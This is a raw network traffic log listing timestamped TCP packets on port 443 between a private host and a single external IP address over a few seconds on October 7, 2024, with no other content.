Oct 7, 2024 18:47:38.467752934 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.467825890 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.468174934 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.468194008 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.468205929 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.468211889 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.472922087 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.472970963 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.474776983 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.474906921 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.474988937 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.474988937 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.476567984 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.476596117 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.476716995 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.476732969 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.476742983 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.476747036 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.478625059 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.478647947 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.478683949 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.478727102 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.478756905 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.478812933 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.478871107 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.478883982 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.479028940 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.479028940 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.479078054 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.479108095 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.481204033 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.481267929 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.481322050 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.481415033 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.481431007 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.949887037 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.950478077 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.950493097 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.950890064 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.950895071 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.034177065 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.039331913 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.039369106 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.039864063 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.039871931 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.068628073 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.068706989 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.068968058 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.069013119 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.069013119 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.069035053 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.069051027 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.071876049 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.071922064 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.072077036 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.072242975 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.072254896 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.104118109 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.104553938 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.104584932 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.104995966 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.105001926 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.106142998 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.106575966 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.106607914 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.106995106 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.107002020 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.137269974 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.137741089 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.137761116 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.138173103 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.138180017 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.147509098 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.147567987 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.147691011 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.147744894 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.147767067 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.147780895 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.147789001 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.150361061 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.150473118 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.150552988 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.150685072 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.150723934 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.213274956 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.213432074 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.213485003 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.213679075 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.213700056 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.213716030 CEST	49751	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.213723898 CEST	443	49751	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.217169046 CEST	49754	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.217233896 CEST	443	49754	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.217305899 CEST	49754	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.219630003 CEST	49754	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.219661951 CEST	443	49754	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.235492945 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.235641956 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.235706091 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.235742092 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.235759974 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.235778093 CEST	49749	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.235785961 CEST	443	49749	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.239526987 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.239562988 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.239738941 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.239826918 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.239844084 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.241115093 CEST	443	49754	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.241182089 CEST	49754	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.241242886 CEST	49754	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.241270065 CEST	443	49754	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.242153883 CEST	49756	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.242193937 CEST	443	49756	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.242367029 CEST	49756	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.242610931 CEST	49756	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.242624044 CEST	443	49756	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.253690958 CEST	443	49756	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.255218983 CEST	49757	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.255285025 CEST	443	49757	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.255361080 CEST	49757	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.255490065 CEST	49757	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.255496025 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.255525112 CEST	443	49757	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.255659103 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.256083012 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.258493900 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.258516073 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.258528948 CEST	49750	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.258537054 CEST	443	49750	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.260876894 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.260910988 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.260987043 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.261142015 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.261173010 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.267195940 CEST	443	49757	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.267518997 CEST	49759	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.267540932 CEST	443	49759	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.267649889 CEST	49759	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.267976046 CEST	49759	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.267990112 CEST	443	49759	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.289508104 CEST	443	49759	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.289565086 CEST	49759	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.289583921 CEST	49759	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.289592981 CEST	443	49759	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.291198015 CEST	49760	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.291213036 CEST	443	49760	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.291270018 CEST	49760	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.291421890 CEST	49760	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.291435003 CEST	443	49760	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.302665949 CEST	443	49760	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.302877903 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.302891970 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.303035975 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.303214073 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.303226948 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.833286047 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.833897114 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.833920002 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.834542036 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.834548950 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.896393061 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.897114992 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.897144079 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:39.897633076 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:39.897639990 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.002485991 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.002558947 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.002729893 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.002867937 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.002895117 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.002911091 CEST	49752	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.002918959 CEST	443	49752	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.005332947 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.005368948 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.005532980 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.005753994 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.005773067 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.010087013 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.010241032 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.010369062 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.010478020 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.010478973 CEST	49753	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.010528088 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.010555983 CEST	443	49753	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.013032913 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.013055086 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.013585091 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.013802052 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.013817072 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.095709085 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.096290112 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.096304893 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.096852064 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.096857071 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.101469040 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.101568937 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.103523016 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.103557110 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.104262114 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.105278969 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.117044926 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.117145061 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.118381977 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.118386984 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.119618893 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.120487928 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.147423029 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.167402029 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.228312969 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.228410959 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.228471994 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.228770971 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.228811979 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.228848934 CEST	49761	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.228863955 CEST	443	49761	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.229943037 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.230107069 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.230145931 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.230345011 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.230361938 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.230375051 CEST	49755	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.230384111 CEST	443	49755	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.231945992 CEST	49766	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.232002974 CEST	443	49766	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.232074976 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.232095003 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.232130051 CEST	49766	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.232141972 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.232274055 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.232289076 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.232400894 CEST	49766	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.232438087 CEST	443	49766	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.251868010 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.251962900 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.252137899 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.252221107 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.252222061 CEST	49758	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.252249002 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.252262115 CEST	443	49758	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.254359961 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.254401922 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.254657984 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.254781961 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.254796982 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.255920887 CEST	443	49766	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.256000996 CEST	49766	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.256001949 CEST	49766	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.256134987 CEST	49769	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.256166935 CEST	443	49769	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.256236076 CEST	49769	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.256462097 CEST	49769	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.256477118 CEST	443	49769	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.282713890 CEST	443	49769	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.284177065 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.284203053 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.284275055 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.284399033 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.284413099 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.561778069 CEST	49766	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.561858892 CEST	443	49766	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.676162958 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.676250935 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.677679062 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.677689075 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.678102016 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.679028034 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.682738066 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.682817936 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.684211969 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.684220076 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.684484005 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.685216904 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.723407030 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.731400967 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.792643070 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.792788982 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.792881966 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.793250084 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.793287039 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.793308020 CEST	49764	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.793318987 CEST	443	49764	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.797224045 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.797291994 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.799568892 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.799998999 CEST	49771	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.800020933 CEST	443	49771	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.805757999 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.805881977 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.805922031 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.806221962 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.806241035 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.806253910 CEST	49763	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.806260109 CEST	443	49763	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.809614897 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.809680939 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.809750080 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.810828924 CEST	49772	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.810846090 CEST	443	49772	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.863087893 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.863794088 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.863816023 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.864182949 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.864188910 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.945875883 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.946470022 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.946540117 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.946954012 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.946962118 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.963469028 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.963531971 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.964694023 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.964704037 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.964952946 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.965981007 CEST	49770	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.977864027 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.978037119 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.978130102 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.978200912 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.978219032 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.978230953 CEST	49767	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.978238106 CEST	443	49767	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.980495930 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.980540991 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:40.980701923 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.980815887 CEST	49773	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:40.980825901 CEST	443	49773	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.011390924 CEST	443	49770	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.083440065 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.083620071 CEST	443	49768	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:41.083729029 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.087137938 CEST	49768	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:41.087167978 CEST	443	49768	13.107.253.72	192.168.2.6
